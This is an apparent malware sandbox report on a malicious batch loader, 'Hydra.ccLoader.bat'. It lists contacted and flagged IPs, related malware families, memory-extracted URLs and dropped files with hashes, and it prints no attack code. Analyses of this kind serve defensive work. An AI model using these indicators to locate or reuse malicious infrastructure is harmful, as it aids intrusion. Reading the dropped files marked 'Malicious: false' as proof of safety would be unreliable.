ipwho.is	108.181.61.49	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipwho.is/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.comSRD1%	svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1739512168.000002AE14142000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2843841020.000002AE14142000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comSRD13	svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835872307.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6xG	powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://outlook.comSRD1-	svchost.exe, 0000002D.00000000.1738511200.000002AE14044000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://osoft.co_2010-06X	dwm.exe, 0000000E.00000000.1544586967.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2878845130.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000014.00000002.2863482747.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.comcom	svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comSRD1#	svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp, Null.6.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.com	svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
135.125.21.87	unknown	United States		18676	AVAYAUS	true
108.181.61.49	ipwho.is	Canada		852	ASN852CA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573922
Start date and time:	2024-12-12 18:00:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	32
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Hydra.ccLoader.bat
Detection:	MAL
Classification:	mal100.spyw.evad.winBAT@30/16@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 62 Number of non-executed functions: 331
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.81.94.65, 2.22.50.144, 2.22.50.131, 40.126.53.18, 40.126.53.7, 40.126.53.19, 40.126.53.8, 20.190.181.5, 20.231.128.65, 40.126.53.15, 40.126.53.13, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Hydra.ccLoader.bat

Simulations

Behavior and APIs

Time	Type	Description
12:02:01	API Interceptor	2x Sleep call for process: WMIC.exe modified
12:02:04	API Interceptor	836x Sleep call for process: powershell.exe modified
12:02:23	API Interceptor	13777x Sleep call for process: svchost.exe modified
12:02:45	API Interceptor	884108x Sleep call for process: winlogon.exe modified
12:02:46	API Interceptor	67336x Sleep call for process: lsass.exe modified
12:02:53	API Interceptor	726586x Sleep call for process: dwm.exe modified
12:03:13	API Interceptor	98x Sleep call for process: spoolsv.exe modified
12:03:14	API Interceptor	123x Sleep call for process: cmd.exe modified
12:03:14	API Interceptor	113x Sleep call for process: conhost.exe modified
12:03:20	API Interceptor	41x Sleep call for process: dllhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.181.61.49	Cracker.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipwho.is	full.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	103.126.138.87
	TeudA4phjN.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	http://www.sbh.co.uk/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	103.126.138.87
	file.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	file.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	ugjigghFzZ.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	http://web-quorvyn.azurewebsites.net	Get hash	malicious	TechSupportScam	Browse	103.126.138.87
	http://womenluxuryfashion.com	Get hash	malicious	TechSupportScam	Browse	103.126.138.87

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN852CA	full.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	jew.sh4.elf	Get hash	malicious	Unknown	Browse	75.158.230.151
	mpsl.elf	Get hash	malicious	Mirai	Browse	198.166.177.229
	mips.elf	Get hash	malicious	Mirai	Browse	142.41.252.248
	https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
	PO2412010.exe	Get hash	malicious	FormBook	Browse	108.181.189.7
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	206.116.110.1
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	108.181.135.156
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	142.82.198.6
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	173.180.89.128
AVAYAUS	jew.m68k.elf	Get hash	malicious	Unknown	Browse	135.67.118.37
	jew.mips.elf	Get hash	malicious	Unknown	Browse	135.79.60.160
	x86_64.elf	Get hash	malicious	Mirai	Browse	135.76.170.60
	Josho.arm7.elf	Get hash	malicious	Mirai	Browse	135.125.81.94
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	198.158.20.177
	Josho.mips.elf	Get hash	malicious	Unknown	Browse	198.158.115.255
	http://em.wdr.to/l/402850829367eb920193a7dbc0230e2f	Get hash	malicious	Unknown	Browse	135.125.161.45
	rebirth.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	135.60.229.251
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	135.58.215.147
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	135.68.125.69

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	4JwhvqLe8n.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	full.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	hoTwj68T1D.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	108.181.61.49

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Windows\$nya-onimai2\MzWhoQ.exe	NhoqAfkhHL.bat	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	7796
Entropy (8bit):	7.971943145771426
Encrypted:	false
SSDEEP:	192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
MD5:	FB60E1AFE48764E6BF78719C07813D32
SHA1:	A1DC74EF8495C9A1489DD937659B5C2875027E16
SHA-256:	EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
SHA-512:	92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
Malicious:	false
Preview:	MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..\|..9.........{...\|d..v.T..w.TMZ.\|...).F.rtAm.....f......T........n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..\|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...\|.h..$."r..hL9TR..}.v%...4).H..[.....r..\|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X\|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.144086598890895
Encrypted:	false
SSDEEP:	6:kK5hL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KDnLNkPlE99SNxAhUe/3
MD5:	BD67A333FF2ACAAB6478418CB3C66A23
SHA1:	F3C09033F33C6E9C58463C6C1B786CA7E38F0AA6
SHA-256:	8E8FCD09240B9F47397F61A09DA81B813873EFE18CD8C62CF2AA6E3777B5E69B
SHA-512:	90165037BD9D969B2D89583B9D6663F579283E96E2DBD5787970474665FBA233280F274A4D63FAF42440344AF4C9452F579242D7C181B8114F1E20597B142C70
Malicious:	false
Preview:	p...... ........vH...L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.2270092039349865
Encrypted:	false
SSDEEP:	6:kKpiWK81wJwcN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:0N0njkPlE99Si1QyIeek
MD5:	1825FC0C60AAED920A5A20DD766067D6
SHA1:	F259A920E9C686DB787A9C1F7673AF93EF804467
SHA-256:	E434CA40A6E51CEDB6A66C228E027BAA30283955F1523FA2FF31607DF80D3751
SHA-512:	215D540D338E6ADD75AC36A3DB25437F6A54C556B737C2492A12D4993FDEA2C8E1D7737DC2F3768B10F8CD3C8108EC95F5C432AF35E10D8C814D23D4D1EB441D
Malicious:	false
Preview:	p...... .........k@..L..(....................................................... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11887
Entropy (8bit):	4.902223164394918
Encrypted:	false
SSDEEP:	192:69smzdcU6Cj9dcU6C7Vsm5emdRYG9smbib4xYTVsm5emdqxoe5gpOWib4g2Ca6pM:8FFYIib4xYTfHib4nopbjvwRjdvRIikK
MD5:	39211000344E9937CA021DE6FC4B9EC7
SHA1:	A4D6DD72F2A2F8D4A481193C100EF438891892DA
SHA-256:	C7E8DA2731FB1F2529C6B42C15A46FC34C935C8C8F1ECC3D1E248CB02AD94ADD
SHA-512:	48615A78F58276706F66095DAB2971A22F7543CA952A7615F03D46C9CAC02813ADFEB6392B3742561BC40588BEB4FD5E76375366B7BA9B125E6B823CCBA37C91
Malicious:	false
Preview:	PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2892
Entropy (8bit):	5.437969087793142
Encrypted:	false
SSDEEP:	48:oizsSU4y4RQmFoUL5a+m9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKEg9qrh7KWBJ5Eo9Adrxk
MD5:	F187E059B6AB94D3F218253CA180C199
SHA1:	20203FAC2034CC4A6F3E0119DC02B9CACEF2973C
SHA-256:	238A0A4F0560A22C11544F0312F7EB787D4B5C60994C6B0904487045CB410AA0
SHA-512:	5BFC8D7159ADC154ECDBC2B8EC716277FEA72E1573C362BF84208AC36056E1FC864636C882C3C272AF9C5F9F7B1E1E56D1DB671A7B01A490040E652850331B0F
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1kok5rx.inc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkjrnls2.h3y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ol4bbblw.uff.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0mcdtjk.eg1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\$nya-onimai2\$nya-Onimai.bat (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
Category:	dropped
Size (bytes):	7306960
Entropy (8bit):	6.017027296439472
Encrypted:	false
SSDEEP:	49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
MD5:	98347650099E648660CEC15B17DBD5C0
SHA1:	C3162C64614F82D20587A1C0A2753C8B616884B7
SHA-256:	39FA01D351C5CDB6DE9C4155F0C7D4241578EA02E5FC735C19FAAE312487DC20
SHA-512:	2B0B853FE69E5F21C1ABAAF2CDA5716B39C72172A59C201BB16D96A2779D169AC07FC8300FE5271C27C982DFFA58EF4955CBF0E4489BA063EEC1F1190A9D11C0
Malicious:	false
